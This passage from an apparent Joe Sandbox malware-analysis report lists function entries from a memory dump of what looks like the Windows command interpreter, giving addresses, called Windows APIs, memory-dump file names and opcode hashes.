                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-3416068913
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 354249369565cc9ef09f053ebda407e590cb74e6a014b37d15ae85d075e39d60
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2911C622A0864B81FB51EB55F1542BDA2909F85BA4FD84232DE6F4B7F5DEBDD4808320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 2$COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1764819092-1738800741
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4145adacbd372f8444f0baa456e0340d6b4c9ec16e6b1af03a09be9d7aa3917b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4518C21A0C24B49FF62BB25A45137DB3A19F44784FC64133DA0F862F5DEBCE8808671
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1522EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4254246844-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 757c993819457d19fbbde932c37bde87c3049a1861c8db628f9d9e56340f3e14
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB41C423A0874B86FF60AB00E44477DE7A0EF89790FD44572DA4F877A4EEBCE4458620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2643372051-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7a5748906c696152ccf6e705b5419b00b721f559189fda1ed1852f61b0ba193d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46F0A262A19B4B81FB00AB25A44407CEAB1FF4A7A0BD59232D56F433B0DFBC94448210
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1591002910-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d21188bd2ade0c669add39b11ffce73f14c6eb686c72b3e53b20c1460e3ce33c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71F05474A0961B8BF744AF11E85507CBBB1BB89711BD44136D90B43330DFBCA4058A20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 338552980-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 32b4df8c8b9c83d7cb440aeefaaeaafa00aa23679f308d796fb0f2d13ca7615f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2E0E563618605C6EB209B50E05106EF7A0FB8C348FC41535EA8E83734DB3CC249CB08
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF7D1525B52
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D1524297
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D15242D7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: memset.MSVCRT ref: 00007FF7D15242FD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: memset.MSVCRT ref: 00007FF7D1524368
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D1524380
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: wcsrchr.MSVCRT ref: 00007FF7D15243E6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: lstrcmpW.KERNELBASE ref: 00007FF7D1524401
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7D1525BC7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 497088868-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d2936a102870fc2e473e1021ea05e970d45393d32fae1a659187c67dd0eb2082
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B731C422B1C64B42FB20BB11A4501BDE290BF89B80FC44173E94FC7BA5DEBCE4418720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1523A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FindClose.KERNELBASE(?,?,?,00007FF7D153EAC5,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1523A56
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a7095d5a2e21f5fbe3c623715e8d26e4e8c7c1892fb70a442dc02fde3abf2173
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1501D621E1864B86FB94AB15A45007DE6A0EF48B40BE0C072E50FC7674DFECF4918710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1529A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1412018758-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 683e940de9068c72f14598f1ca0740ef5181837ca1376a077d913d7874896a00
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09E01242F5971F91FF143B6268811BC92545F6A740FD82472DD1F857A2EFEDA0918730
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
